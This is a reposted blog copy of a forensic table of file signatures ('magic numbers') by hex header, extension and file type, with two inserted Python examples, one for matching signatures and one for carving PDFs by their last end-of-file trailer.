posted by 블르샤이닝 2012. 9. 25. 10:39

Heh heh heh heh, reposting, reposting, reposting

-----------------------------------------------------------------------------------------------------

FILE SIGNATURES TABLE

11 June 2012


This table of file signatures (aka "magic numbers") is a continuing work-in-progress. I have found little information on this in a single place, with the exception of the table in Forensic Computing: A Practitioner's Guide by T. Sammes & B. Jenkinson (Springer, 2000); that was my inspiration to start this list. See also Wikipedia's List of file signatures. Comments, additions, and queries can be sent to Gary Kessler at gck@garykessler.net.

This list is not exhaustive. Interpret the table as the magic number generally indicating the file type rather than the file type always having the given magic number. If you want to know to what a particular file extension refers, check out some of these sites:
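As an added example (not part of the original table or of Gary Kessler's work), the Python script below applies a handful of the entries from this table the way a forensic triage or upload-validation tool would: it converts the page's hex notation (including the `xx`/`nn` wildcard bytes and the `[N byte offset]` entries) into byte patterns, matches a buffer against all of them, and flags files whose extension disagrees with their magic number. The signature subset, the extension groupings and the sample buffers are constructed here for illustration; a real deployment would load the full table.

```python
"""Magic-number matcher over a constructed subset of the file signatures table."""

# (hex signature in the table's notation, byte offset, candidate extensions)
# Constructed subset for illustration; "xx"/"nn" are wildcard bytes.
SIGNATURES = [
    ("89 50 4E 47 0D 0A 1A 0A", 0, "PNG"),
    ("50 4B 03 04", 0, "ZIP/JAR/DOCX/XLSX/PPTX"),
    ("4D 5A", 0, "EXE/DLL/SYS"),
    ("7F 45 4C 46", 0, "ELF"),
    ("25 50 44 46", 0, "PDF/FDF"),
    ("00 00 00 nn 66 74 79 70", 0, "MP4/MOV/3GP/M4A"),
    ("52 49 46 46 xx xx xx xx 57 41 56 45 66 6D 74 20", 0, "WAV"),
    ("0F 00 E8 03", 512, "PPT"),
    ("75 73 74 61 72", 257, "TAR"),
]


def parse_pattern(sig):
    """'89 50 xx' -> [0x89, 0x50, None]; None is a wildcard byte."""
    return [None if tok.lower() in ("xx", "nn") else int(tok, 16)
            for tok in sig.split()]


def matches(data, pattern, offset):
    """True if data carries the pattern starting at the given byte offset."""
    if len(data) < offset + len(pattern):
        return False
    return all(p is None or data[offset + i] == p
               for i, p in enumerate(pattern))


def identify(data):
    """Return every candidate-extension group whose signature matches.
    More than one hit is normal (polyglots, generic headers such as MZ),
    so treat a match as evidence of the type, not proof."""
    return [exts for sig, offset, exts in SIGNATURES
            if matches(data, parse_pattern(sig), offset)]


def extension_agrees(filename, data):
    """True if the name's extension is among the magic-number candidates.
    False is the classic renamed-executable / spoofed-upload signal."""
    ext = filename.rsplit(".", 1)[-1].upper() if "." in filename else ""
    return any(ext in group.split("/") for group in identify(data))


# Constructed sample buffers (headers only, zero-padded; not real files).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24
MP4_BYTES = b"\x00\x00\x00\x14ftypisom" + b"\x00" * 12
TAR_BYTES = b"\x00" * 257 + b"ustar\x00" + b"\x00" * 250
PPT_BYTES = b"\x00" * 512 + b"\x0f\x00\xe8\x03" + b"\x00" * 16
EXE_BYTES = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 24

if __name__ == "__main__":
    samples = [("photo.png", PNG_BYTES), ("photo.jpg", PNG_BYTES),
               ("clip.mp4", MP4_BYTES), ("backup.tar", TAR_BYTES),
               ("deck.ppt", PPT_BYTES), ("invoice.pdf", EXE_BYTES)]
    for name, buf in samples:
        print(f"{name:12s} {identify(buf)!s:26s} "
              f"extension-agrees={extension_agrees(name, buf)}")
```

The offset entries matter in practice: a `ustar` check at byte 0 would miss every tar file, and the Office subheaders at 512 only mean something once the container at offset 0 has already been recognised.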

Some useful additional information:


ACKNOWLEDGEMENTS


Columns: Hex Signature, ASCII Signature, File Extension, File Description.
In the flattened entries below, the hex bytes come first (with the ASCII rendering on the same line or on the indented lines beneath), followed by the extension(s) and the description.

n/a (no header signature; identify by trailer)
TGA Truevision Targa Graphic file
Trailer:
54 52 55 45 56 49 53 49   TRUEVISI
4F 4E 2D 58 46 49 4C 45   ON-XFILE
2E 00                     ..

00 .
PIC IBM Storyboard bitmap file
MOV Apple QuickTime movie file
PIF Windows Program Information File
SEA Mac Stuffit Self-Extracting Archive
YTR IRIS OCR data file

[11 byte offset]
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
 [11 byte offset]
........
........
........
PDB Palmpilot Database/Document File

[512 byte offset]
00 00 00 00 00 00 00 00
 [512 byte offset]
........
RVT Revit Project File subheader

00 00 00 0C 6A 50 20 20
0D 0A
 ....jP 
..
JP2 Various JPEG-2000 image file formats

00 00 00 nn 66 74 79 70
33 67 70
 ....ftyp
3gp
3GG, 3GP, 3G2 3rd Generation Partnership Project 3GPP (nn=0x14)
and 3GPP2 (nn=0x20) multimedia files

00 00 00 14 66 74 79 70
69 73 6F 6D
 ....ftyp
isom
MP4 ISO Base Media file (MPEG-4) v1

00 00 00 14 66 74 79 70
71 74 20 20
 ....ftyp
qt
MOV QuickTime movie file

00 00 00 18 66 74 79 70
33 67 70 35
 ....ftyp
3gp5
MP4 MPEG-4 video files

00 00 00 18 66 74 79 70
6D 70 34 32
 ....ftyp
mp42
M4V MPEG-4 video/QuickTime file

00 00 00 20 66 74 79 70
4D 34 41 20
 ....ftyp
M4A
M4A Apple Lossless Audio Codec file

00 00 01 00 ....
ICO Windows icon file
SPL Windows NT/2000/XP printer spool file

00 00 01 Bx ....
MPEG, MPG MPEG video file
Trailer:
00 00 01 B7 (...·)

00 00 01 BA ....º
MPG, VOB DVD Video Movie File (video/dvd, video/mpeg) or DVD MPEG2
Trailer:
00 00 01 B9 (...¹)

00 00 02 00 ....
CUR Windows cursor file
WB2 QuattroPro for Windows Spreadsheet file

00 00 02 00 06 04 06 00
08 00 00 00 00 00
 ........
......
WK1 Lotus 1-2-3 spreadsheet (v1) file

00 00 1A 00 00 10 04 00
00 00 00 00
 ........
....
WK3 Lotus 1-2-3 spreadsheet (v3) file

00 00 1A 00 02 10 04 00
00 00 00 00
 ........
....
WK4, WK5 Lotus 1-2-3 spreadsheet (v4, v5) file

00 00 1A 00 05 10 04 .......
123 Lotus 1-2-3 spreadsheet (v9) file

00 00 49 49 58 50 52 or ..IIXPR
00 00 4D 4D 58 50 52 ..MMXPR
QXD Quark Express document (Intel & Motorola, respectively)
NOTE: It appears that the byte following the 0x52 ("R") is
the language indicator; 0x33 ("3") seems to indicate English
and 0x61 ("a") reportedly indicates Korean.

00 00 FE FF ..þÿ
n/a Byte-order mark for 32-bit Unicode Transformation Format/
4-octet Universal Character Set (UTF-32/UCS-4), big-endian files.
(See the Unicode Home Page.)

[6 byte offset]
00 00 FF FF FF FF
 [6 byte offset]
..ÿÿÿÿ
HLP Windows Help file

00 01 00 00 4D 53 49 53
41 4D 20 44 61 74 61 62
61 73 65
 ....MSIS
AM Datab
ase
MNY Microsoft Money file

00 01 00 00 53 74 61 6E
64 61 72 64 20 41 43 45
20 44 42
 ....Stan
dard ACE
 DB
ACCDB Microsoft Access 2007 file

00 01 00 00 53 74 61 6E
64 61 72 64 20 4A 65 74
20 44 42
 ....Stan
dard Jet
 DB
MDB Microsoft Access file

00 01 00 08 00 01 00 01
01
 ........
.
IMG Ventura Publisher/GEM VDI Image Format Bitmap file

00 01 01 ...
FLT OpenFlight 3D file

00 01 42 41 ..BA
ABA Palm Address Book Archive file

00 01 42 44 ..BD
DBA Palm DateBook Archive file

00 06 15 61 00 00 00 02
00 00 04 D2 00 00 10 00
 ...a....
...Ò....
DB Netscape Navigator (v4) database file

00 11 AF ..¯
FLI FLIC Animation file

00 14 00 00 01 02 xx xx
03
 ........
.
n/a BIOS details in RAM images

00 1E 84 90 00 00 00 00 ..„.....
SNM Netscape Communicator (v4) mail folder

00 5C 41 B1 FF .\A±ÿ
ENC Mujahideen Secrets 2 encrypted file

00 BF .¿
SOL Adobe Flash shared object file (e.g., Flash cookies)

[512 byte offset]
00 6E 1E F0
 [512 byte offset]
.n.ð
PPT PowerPoint presentation subheader (MS Office)

00 FF FF FF FF FF FF FF
FF FF FF 00 00 02 00 01
 .ÿÿÿÿÿÿÿ
ÿÿÿ.....
MDF Alcohol 120% CD image

01 00 00 00 ....
EMF Extended (Enhanced) Windows Metafile Format, printer spool file
(0x18-17 & 0xC4-36 is Win2K/NT; 0x5C0-1 is WinXP)

01 00 00 00 01 .....
PIC Unknown type picture file

01 00 09 00 00 03 ......
WMF Windows Metafile (Win 3.x format)

01 00 39 30 ..90
FDB, GDB Firebird and Interbase database files, respectively. See
IBPhoenix for more information.

01 0F 00 00 ....
MDF Microsoft SQL Server 2000 database

01 10 ..
TR1 Novell LANalyzer capture file

01 DA 01 01 00 03 .Ú....
RGB Silicon Graphics RGB Bitmap

01 FF 02 04 03 02 .ÿ....
DRW Micrografx vector graphic file

02 64 73 73 .dss
DSS Digital Speech Standard (Olympus, Grundig, & Phillips)

03 .
DAT MapInfo Native Data Format
DB3 dBASE III file

03 00 00 00 ....
QPH Quicken price history file

03 00 00 00 41 50 50 52 ....APPR
ADX Approach index file

04 .
DB4 dBASE IV data file

04 00 00 00 xx xx xx xx
xx xx xx xx 20 03 00 00
 or
 ........
.... ...
05 00 00 00 xx xx xx xx
xx xx xx xx 20 03 00 00
 ........
.... ...
n/a INFO2 Windows recycle bin file. NOTE: Bytes 12-13
indicate the size of each INFO2 record (little-endian); the most common
value is 0x20-03 (0x0320 = 800 bytes).

07 .
DRW A common signature and file extension for many drawing
programs.

07 53 4B 46 .SKF
SKF SkinCrafter skin file

07 64 74 32 64 64 74 64 .dt2ddtd
DTD DesignTools 2D Design file

08 .
DB dBASE IV or dBFast configuration file

[512 byte offset]
09 08 10 00 00 06 05 00
 [512 byte offset]
........
XLS Excel spreadsheet subheader (MS Office)

0A nn 01 01 ....
PCX ZSOFT Paintbrush file
(where nn = 0x02, 0x03, or 0x05)

0C ED 
MP Monochrome Picture TIFF bitmap file (unconfirmed)

0D 44 4F 43 .DOC
DOC DeskMate Document file

0E 4E 65 72 6F 49 53 4F .NeroISO
NRI Nero CD Compilation

0E 57 4B 53 .WKS
WKS DeskMate Worksheet

[512 byte offset]
0F 00 E8 03
 [512 byte offset]
..è.
PPT PowerPoint presentation subheader (MS Office)

11 00 00 00 53 43 43 41 ....SCCA
PF Windows prefetch file

1A 00 00 ...
NTF Lotus Notes database template

1A 00 00 04 00 00 ......
NSF Lotus Notes database

1A 0x ..
ARC LH archive file, old version
(where x = 0x2, 0x3, 0x4, 0x8 or 0x9
for types 1-5, respectively)

1A 0B ..
PAK Compressed archive file
(often associated with Quake Engine games)

1A 35 01 00 .5..
ETH GN Nettest WinPharoah capture file

1A 45 DF A3 93 42 82 88
6D 61 74 72 6F 73 6B 61
 .Eߣ“B‚ˆ
matroska
MKV Matroska stream file

1A 52 54 53 20 43 4F 4D
50 52 45 53 53 45 44 20
49 4D 41 47 45 20 56 31
2E 30 1A
 .RTS COM
PRESSED 
IMAGE V1
.0.
DAT Runtime Software disk image

1D 7D .}
WS WordStar Version 5.0/6.0 document

1F 8B 08 .‹.
GZ, TGZ GZIP archive file

1F 9D ..
TAR.Z Compressed tape archive file using standard (Lempel-Ziv-Welch) compression

1F A0 
TAR.Z Compressed tape archive file using LZH (Lempel-Ziv-Huffman) compression

21 !
BSB MapInfo Sea Chart

21 12 !.
AIN AIN Compressed Archive

21 3C 61 72 63 68 3E 0A !<arch>.
LIB Unix archiver (ar) files and Microsoft Program Library
Common Object File Format (COFF)

21 42 44 4E !BDN
PST Microsoft Outlook Personal Folder File

23 20 #
MSI Cerius2 file

23 20 44 69 73 6B 20 44
65 73 63 72 69 70 74 6F
 # Disk D
escripto
VMDK VMware 4 Virtual Disk description file (split disk)

23 20 4D 69 63 72 6F 73
6F 66 74 20 44 65 76 65
6C 6F 70 65 72 20 53 74
75 64 69 6F
 # Micros
oft Deve
loper St
udio
DSP Microsoft Developer Studio project file

23 21 41 4D 52 #!AMR
AMR Adaptive Multi-Rate ACELP (Algebraic Code Excited Linear Prediction)
Codec, commonly audio format with GSM cell phones. (See RFC 4867.)

23 3F 52 41 44 49 41 4E
43 45 0A
 #?RADIAN
CE.
HDR Radiance High Dynamic Range image file

24 46 4C 32 40 28 23 29
20 53 50 53 53 20 44 41
54 41 20 46 49 4C 45
 $FL2@(#)
 SPSS DA
TA FILE
SAV SPSS Data file

25 21 50 53 2D 41 64 6F
62 65 2D 33 2E 30 20 45
50 53 46 2D 33 2E 30
 %!PS-Ado
be-3.0 E
PSF-3.0
EPS Adobe encapsulated PostScript file
(If this signature is not at the immediate
beginning of the file, it will occur early
in the file, commonly at byte offset 30)

25 50 44 46 %PDF
PDF, FDF Adobe Portable Document Format and Forms Document file
Trailers:
0A 25 25 45 4F 46 (.%%EOF)
0A 25 25 45 4F 46 0A (.%%EOF.)
0D 0A 25 25 45 4F 46 0D 0A (..%%EOF..)
0D 25 25 45 4F 46 0D (.%%EOF.)
NOTE: There may be multiple end-of-file marks within the
file. When carving, be sure to get the last one.
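To make the carving advice above concrete, here is an added Python example (not from the original table) that carves PDF documents out of a raw byte buffer: it locates each `%PDF` header, then takes the LAST of the four `%%EOF` trailer variants listed above that occurs before the next header, so an incrementally updated file (which carries one `%%EOF` per update) is recovered whole rather than cut at its first, stale end-of-file mark. The buffer is constructed inline for the test; `carve_pdfs` is a name chosen here.

```python
"""Carve PDFs from unstructured data, honouring the last %%EOF trailer."""
import re

PDF_HEADER = b"%PDF"
# The four trailer variants from the table. The longer forms are tried as
# well so the carved span keeps the CR/LF bytes that belong to the marker.
PDF_TRAILERS = [b"\r\n%%EOF\r\n", b"\n%%EOF\n", b"\r%%EOF\r", b"\n%%EOF"]


def carve_pdfs(blob):
    """Return (start, end) byte spans of PDF documents found in blob.

    Each document runs from a %PDF header to the LAST %%EOF trailer that
    appears before the next %PDF header (or the end of the buffer).
    Incrementally updated PDFs contain several %%EOF marks; stopping at the
    first one would truncate the file and lose the newest xref section.
    """
    starts = [m.start() for m in re.finditer(re.escape(PDF_HEADER), blob)]
    spans = []
    for i, start in enumerate(starts):
        limit = starts[i + 1] if i + 1 < len(starts) else len(blob)
        region = blob[start:limit]
        end = None
        for trailer in PDF_TRAILERS:
            pos = region.rfind(trailer)
            if pos != -1:
                candidate = start + pos + len(trailer)
                end = candidate if end is None else max(end, candidate)
        if end is not None:          # a header with no trailer at all is skipped
            spans.append((start, end))
    return spans


# Constructed test buffer: two minimal PDF-like documents separated by junk.
# DOC1 has been incrementally updated, so it carries two %%EOF marks.
DOC1 = (b"%PDF-1.4\n1 0 obj<<>>endobj\nstartxref\n9\n%%EOF\n"
        b"2 0 obj<<>>endobj\nstartxref\n48\n%%EOF\n")
DOC2 = b"%PDF-1.7\r\ntrailer<<>>\r\nstartxref\r\n9\r\n%%EOF\r\n"
JUNK = b"\x00" * 16
BLOB = JUNK + DOC1 + JUNK + DOC2 + JUNK

if __name__ == "__main__":
    for start, end in carve_pdfs(BLOB):
        print(f"PDF at bytes {start}-{end}: {BLOB[start:end]!r}")
```

One caveat a practitioner should keep in mind: a `%PDF` string can also occur inside a document (an embedded PDF attachment, for instance), which this header-to-next-header rule would split into two; validating each carved span with a PDF parser afterwards catches that.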

28 54 68 69 73 20 66 69
6C 65 20 6D 75 73 74 20
62 65 20 63 6F 6E 76 65
72 74 65 64 20 77 69 74
68 20 42 69 6E 48 65 78
20
 (This fi
le must 
be conve
rted wit
h BinHex
 
HQX Macintosh BinHex 4 Compressed Archive

2A 2A 2A 20 20 49 6E 73
74 61 6C 6C 61 74 69 6F
6E 20 53 74 61 72 74 65
64 20
 ***  Ins
tallatio
n Starte
d
LOG Symantec Wise Installer log file

[2 byte offset]
2D 6C 68
 [2 byte offset]
-lh
LHA, LZH Compressed archive file

2E 52 45 43 .REC
IVR RealPlayer video file (V11 and later)

2E 52 4D 46 .RMF
RM, RMVB RealMedia streaming media file

2E 52 4D 46 00 00 00 12
00
 .RMF....
.
RA RealAudio file

2E 72 61 FD 00 .raý.
RA RealAudio streaming media file

2E 73 6E 64 .snd
AU NeXT/Sun Microsystems µ-Law audio file

30 0
CAT Microsoft security catalog file

30 00 00 00 4C 66 4C 65 0...LfLe
EVT Windows Event Viewer file

30 26 B2 75 8E 66 CF 11
A6 D9 00 AA 00 62 CE 6C
 0&²u.fÏ.
¦Ù.ª.bÎl
ASF, WMA, WMV Microsoft Windows Media Audio/Video File
(Advanced Streaming Format)

30 31 4F 52 44 4E 41 4E
43 45 20 53 55 52 56 45
59 20 20 20 20 20 20 20
 01ORDNAN
CE SURVE
Y
NTF National Transfer Format Map File

30 37 30 37 30 nn 07070.
n/a Archive created with the cpio utility (where nn
values 0x37 ("7"), 0x31 ("1"), and 0x32 ("2") refer to the
standard ASCII format, new ASCII (aka SVR4) format, and CRC
format, respectively. (The swpackage(8) page has additional
information.) (Thanks to F. Webber for this....)

31 BE or 
32 BE 
WRI Microsoft Write file

34 CD B2 A1 4Ͳ¡
n/a Extended tcpdump (libpcap) capture file (Linux/Unix)

37 7A BC AF 27 1C 7z¼¯'.
7Z 7-Zip compressed file

37 E4 53 96 C9 DB D6 07 7äS–ÛÖ.
n/a zisofs compression format, recognized by some Linux kernels. See the
libburnia page for additional information.

38 42 50 53 8BPS
PSD Photoshop image file

3A 56 45 52 53 49 4F 4E :VERSION
SLE Surfplan kite project file

3C <
ASX Advanced Stream redirector file
XDR BizTalk XML-Data Reduced Schema file

3C 21 64 6F 63 74 79 70 <!doctyp
DCI AOL HTML mail file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D
 <?xml ve
rsion=
MANIFEST Windows Visual Stylesheet XML file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D 22 31
2E 30 22 3F 3E
 <?xml ve
rsion="1
.0"?>
XUL XML User Interface Language file

3C 3F 78 6D 6C 20 76 65
72 73 69 6F 6E 3D 22 31
2E 30 22 3F 3E 0D 0A 3C
4D 4D 43 5F 43 6F 6E 73
6F 6C 65 46 69 6C 65 20
43 6F 6E 73 6F 6C 65 56
65 72 73 69 6F 6E 3D 22
 <?xml ve
rsion="1
.0"?>..<
MMC_Cons
oleFile 
ConsoleV
ersion="
MSC Microsoft Management Console Snap-in Control file

3C 4D 61 6B 65 72 46 69
6C 65 20
 <MakerFi
le
FM, MIF Adobe FrameMaker file

[24 byte offset]
3E 00 03 00 FE FF 09 00
06
 [24 byte offset]
>...þÿ..
.
WB3 Quattro Pro for Windows 7.0 Notebook file

3F 5F 03 00 ?_..
GID Windows Help index file
HLP Windows Help file

[32 byte offset]
40 40 40 20 00 00 40 40
40 40
 [32 byte offset]
@@@ ..@@
@@
ENL EndNote Library File

41 43 31 30 AC10
DWG Generic AutoCAD drawing

NOTES on AutoCAD file headers: The 0x41-43-31-30 (AC10) is a generic header, occupying the first
four bytes in the file. The next two bytes give further indication about the version or subtype:

  • 0x30-32 (02) — AutoCAD R2.5
  • 0x30-33 (03) — AutoCAD R2.6
  • 0x30-34 (04) — AutoCAD R9
  • 0x30-36 (06) — AutoCAD R10
  • 0x30-39 (09) — AutoCAD R11/R12
  • 0x31-30 (10) — AutoCAD R13 (subtype 10)
  • 0x31-31 (11) — AutoCAD R13 (subtype 11)
  • 0x31-32 (12) — AutoCAD R13 (subtype 12)
  • 0x31-33 (13) — AutoCAD R14 (subtype 13)
  • 0x31-34 (14) — AutoCAD R14 (subtype 14)
  • 0x31-35 (15) — AutoCAD R2000
  • 0x31-38 (18) — AutoCAD R2004
  • 0x32-31 (21) — AutoCAD R2007

41 43 76 ACv
SLE Steganos Security Suite virtual secure drive

41 43 53 44 ACSD
n/a Miscellaneous AOL parameter and information files

41 45 53 AES
AES AES Crypt file format. (The fourth byte is the version number.)

41 4D 59 4F AMYO
SYW Harvard Graphics symbol graphic

41 4F 4C 20 46 65 65 64
62 61 67
 AOL Feed
bag
BAG AOL and AIM buddy list file

41 4F 4C 44 42 AOLDB
ABY, IDX AOL database files: address book (ABY) and user configuration
data (MAIN.IDX)

41 4F 4C 49 44 58 AOLIDX
IND AOL client preferences/settings file (MAIN.IND)

41 4F 4C 49 4E 44 45 58 AOLINDEX
ABI AOL address book index file

41 4F 4C 56 4D 31 30 30 AOLVM100
ORG, PFC AOL personal file cabinet (PFC) file

41 56 47 36 5F 49 6E 74
65 67 72 69 74 79 5F 44
61 74 61 62 61 73 65
 AVG6_Int
egrity_D
atabase
DAT AVG6 Integrity database file

41 72 43 01 ArC.
ARC FreeArc compressed file

42 41 41 44 BAAD
n/a NTFS Master File Table (MFT) entry (1,024 bytes)

42 45 47 49 4E 3A 56 43
41 52 44 0D 0A
 BEGIN:VC
ARD..
VCF vCard file

42 4C 49 32 32 33 51 BLI223Q
BIN Thomson Speedtouch series WLAN router firmware

42 4D BM
BMP, DIB Windows (or device-independent) bitmap image
NOTE: Bytes 2-5 contain the file length in little-endian order.

42 4F 4F 4B 4D 4F 42 49 BOOKMOBI
PRC Palmpilot resource file

42 5A 68 BZh
BZ2, TAR.BZ2, TBZ2, TB2 bzip2 compressed archive

43 23 2B 44 A4 43 4D A5
48 64 72
 C#+D¤CM¥
Hdr
RTD RagTime document file

43 42 46 49 4C 45 CBFILE
CBD WordPerfect dictionary file (unconfirmed)

43 44 30 30 31 CD001
ISO ISO-9660 CD Disc Image
This signature usually occurs at byte offset 32769 (0x8001),
34817 (0x8801), or 36865 (0x9001).
More information can be found at MacTech or at ECMA.

43 4D 58 31 CMX1
CLB Corel Binary metafile

43 4F 4D 2B COM+
CLB COM+ Catalog file

43 4F 57 44 COWD
VMDK VMware 3 Virtual Disk (portion of a split disk) file

43 50 54 37 46 49 4C 45 CPT7FILE
CPT Corel Photopaint file

43 50 54 46 49 4C 45 CPTFILE
CPT Corel Photopaint file

43 52 45 47 CREG
DAT Windows 9x registry hive

43 52 55 53 48 20 76 CRUSH v
CRU Crush compressed archive

43 57 53 CWS
SWF Shockwave Flash file (v5+)

43 61 74 61 6C 6F 67 20
33 2E 30 30 00
 Catalog 
3.00.
CTF WhereIsIt Catalog file

43 6C 69 65 6E 74 20 55
72 6C 43 61 63 68 65 20
4D 4D 46 20 56 65 72 20
 Client U
rlCache 
MMF Ver
DAT IE History (index.dat) file

44 42 46 48 DBFH
DB Palm Zire photo database

44 4D 53 21 DMS!
DMS Amiga DiskMasher compressed archive

44 4F 53 DOS
ADF Amiga disk file

44 56 44 DVD
DVR DVR-Studio stream file
IFO DVD info file

45 4C 49 54 45 20 43 6F
6D 6D 61 6E 64 65 72 20
 ELITE Co
mmander
CDR Elite Plus Commander saved game file

45 4E 54 52 59 56 43 44
02 00 00 01 02 00 18 58
 ENTRYVCD
.......X
VCD VideoVCD (GNU VCDImager) file

45 52 46 53 53 41 56 45
44 41 54 41 46 49 4C 45
 ERFSSAVE
DATAFILE
DAT Kroll EasyRecovery Saved Recovery State file

45 50 EP
MDI Microsoft Document Imaging file

45 56 46 09 0D 0A FF 00 EVF...ÿ.
Enn (where nn are numbers) Expert Witness Compression Format (EWF) file, including EWF-E01
and EWF-S01, as used in EnCase and SMART evidence files.
See the EWF specification.

45 56 46 32 0D 0A 81 EVF2...
Exnn (where nn are numbers) EnCase® Evidence File Format Version 2 (Ex01).
See the document.

45 6C 66 46 69 6C 65 00 ElfFile.
EVTX Windows Vista event log file

45 86 00 00 06 00 E†....
QBB Intuit QuickBooks backup file

46 41 58 43 4F 56 45 52
2D 56 45 52
 FAXCOVER
-VER
CPE Microsoft Fax Cover Sheet

46 44 42 48 00 FDBH.
FDB Fiasco database definition file

46 45 44 46 FEDF
SBV (Unknown file type)

46 49 4C 45 FILE
n/a NTFS Master File Table (MFT) entry (1,024 bytes)

46 4C 56 01 FLV.
FLV Flash video file

46 4F 52 4D 00 FORM.
AIFF Audio Interchange File

46 57 53 FWS
SWF Macromedia Shockwave Flash player file

46 72 6F 6D 20 20 20 or From
46 72 6F 6D 20 3F 3F 3F or From ???
46 72 6F 6D 3A 20 From:
EML A common file extension for e-mail files. Signatures shown here
are for Netscape, Eudora, and a generic signature, respectively.
EML is also used by Outlook Express and QuickMail.

47 46 31 50 41 54 43 48 GF1PATCH
PAT Advanced Gravis Ultrasound patch file

47 49 46 38 37 61 or GIF87a
47 49 46 38 39 61 GIF89a
GIF Graphics interchange format file
Trailer: 00 3B (.;)

47 50 41 54 GPAT
PAT GIMP (GNU Image Manipulation Program) pattern file

47 58 32 GX2
GX2 Show Partner graphics file (not confirmed)

47 65 6E 65 74 65 63 20
4F 6D 6E 69 63 61 73 74
 Genetec 
Omnicast
G64 Genetec video archive

48 48 47 42 31 HHGB1
SH3 Harvard Graphics presentation file

49 20 49 I I
TIF, TIFF Tagged Image File Format file

49 44 33 ID3
MP3 MPEG-1 Audio Layer 3 (MP3) audio file

49 44 33 03 00 00 00 ID3....
KOZ Sprint Music Store audio file (for mobile devices)

49 49 1A 00 00 00 48 45
41 50 43 43 44 52 02 00
 II....HE
APCCDR..
CRW Canon digital camera RAW file

49 49 2A 00 II*.
TIF, TIFF Tagged Image File Format file (little
endian, i.e., least significant byte first; Intel)

49 49 2A 00 10 00 00 00
43 52
 II*.....
CR
CR2 Canon digital camera RAW file

49 53 63 28 ISc(
CAB, HDR Install Shield v5.x or 6.x compressed file

49 54 4F 4C 49 54 4C 53 ITOLITLS
LIT Microsoft Reader eBook file

49 54 53 46 ITSF
CHI, CHM Microsoft Compiled HTML Help File

49 6E 6E 6F 20 53 65 74
75 70 20 55 6E 69 6E 73
74 61 6C 6C 20 4C 6F 67
20 28 62 29
 Inno Set
up Unins
tall Log
 (b)
DAT Inno Setup Uninstall Log file

49 6E 74 65 72 40 63 74
69 76 65 20 50 61 67 65
 Inter@ct
ive Page
IPD Inter@ctive Pager Backup (BlackBerry) backup file
(See also IPD File Format page or IPD File for BlackBerry)

4A 41 52 43 53 00 JARCS.
JAR JARCS compressed archive

4A 47 03 0E or JG..
4A 47 04 0E JG..
ART AOL ART file
Trailers:
For 0x4A-47-03-0E: D0 CB 00 00 (ÐË..)
For 0x4A-47-04-0E: CF C7 CB (ÏÇË)

4B 44 4D KDM
VMDK VMware 4 Virtual Disk (portion of a split disk) file

4B 44 4D 56 KDMV
VMDK VMware 4 Virtual Disk (monolithic disk) file

4B 47 42 5F 61 72 63 68
20 2D
 KGB_arch
 -
KGB KGB archive

4B 49 00 00 KI..
SHD Windows 9x printer spool file

4B 57 41 4A 88 F0 27 D1 KWAJˆð'Ñ
n/a KWAJ file format used by DOS COMPRESS.EXE and EXPAND.EXE commands.
This command compresses a single file, replacing the last character in the file name
with an underscore or dollar sign, e.g., FOO.BAZ would be renamed FOO.BA_ or
FOO.BA$. (See the SZDD/KWAJ page for more information.)

4C 00 00 00 01 14 02 00 L.......
LNK Windows shortcut file. See also The Meaning of Linkfiles in Forensic Examinations.

4C 01 L.
OBJ Microsoft Common Object File Format (COFF) relocatable
object code file for an Intel 386 or later/compatible processors

4C 4E 02 00 LN..
GID Windows Help index file
HLP Windows Help file. 

4C 56 46 09 0D 0A FF 00 LVF...ÿ.
Enn (where nn are numbers) Logical File Evidence Format (EWF-L01) as used in later versions of
EnCase evidence files. See the EWF specification.

4D 2D 57 20 50 6F 63 6B
65 74 20 44 69 63 74 69
 M-W Pock
et Dicti
PDB Merriam-Webster Pocket Dictionary file

4D 41 52 31 00 MAR1.
MAR Mozilla archive

4D 41 52 43 MARC
MAR Microsoft/MSN MARC archive

4D 41 72 30 00 MAr0.
MAR MAr compressed archive

4D 44 4D 50 93 A7 MDMP“§
HDMP Windows heap dump file
DMP Windows minidump file

4D 49 4C 45 53 MILES
MLS Milestones v1.0 project management and scheduling software
(Also see "MV2C" and "MV214" signatures)

4D 4C 53 57 MLSW
MLS Skype localization data file

4D 4D 00 2A MM.*
TIF, TIFF Tagged Image File Format file (big
endian, i.e., most significant byte first; Motorola)

4D 4D 00 2B MM.+
TIF, TIFF BigTIFF files; Tagged Image File Format files >4 GB

4D 4D 4D 44 00 00 MMMD..
MMF Yamaha Corp. Synthetic music Mobile Application Format (SMAF)
for multimedia files that can be played on hand-held devices.

4D 52 56 4E MRVN
NVRAM VMware BIOS (non-volatile RAM) state file.

4D 53 43 46 MSCF
CAB Microsoft cabinet file
PPZ Powerpoint Packaged Presentation
SNP Microsoft Access Snapshot Viewer file

4D 53 46 54 02 00 01 00 MSFT....
TLB OLE, SPSS, or Visual C++ type library file

4D 53 5F 56 4F 49 43 45 MS_VOICE
CDR, DVF Sony Compressed Voice File
MSV Sony Memory Stick Compressed Voice file

4D 54 68 64 MThd
MID, MIDI Musical Instrument Digital Interface (MIDI) sound file

4D 56 MV
DSN CD Stomper Pro label file

4D 56 32 31 34 MV214
MLS Milestones v2.1b project management and scheduling software
(Also see "MILES" and "MV2C" signatures)

4D 56 32 43 MV2C
MLS Milestones v2.1a project management and scheduling software
(Also see "MILES" and "MV214" signatures)

4D 5A MZ
COM, DLL, DRV, EXE, PIF, QTS, QTX, SYS Windows/DOS executable file
(See The MZ EXE File Format page for the structure of an EXE file,
with coverage of NE, TLINK, PE, self-extracting archives, and more.)
ACM MS audio compression manager driver
AX Library cache file
CPL Control panel application
FON Font file
OCX ActiveX or OLE Custom Control
OLB OLE object library
SCR Screen saver
VBX VisualBASIC application
VXD, 386 Windows virtual device drivers

4D 5A 90 00 03 00 00 00 MZ......
API Acrobat plug-in
AX DirectShow filter
FLT Audition graphic filter file (Adobe)

4D 5A 90 00 03 00 00 00
04 00 00 00 FF FF
 MZ......
....ÿÿ
ZAP ZoneAlarm data file

4D 69 63 72 6F 73 6F 66
74 20 43 2F 43 2B 2B 20
 Microsof
t C/C++
PDB Microsoft C++ debugging symbols file

4D 69 63 72 6F 73 6F 66
74 20 56 69 73 75 61 6C
20 53 74 75 64 69 6F 20
53 6F 6C 75 74 69 6F 6E
20 46 69 6C 65
 Microsof
t Visual
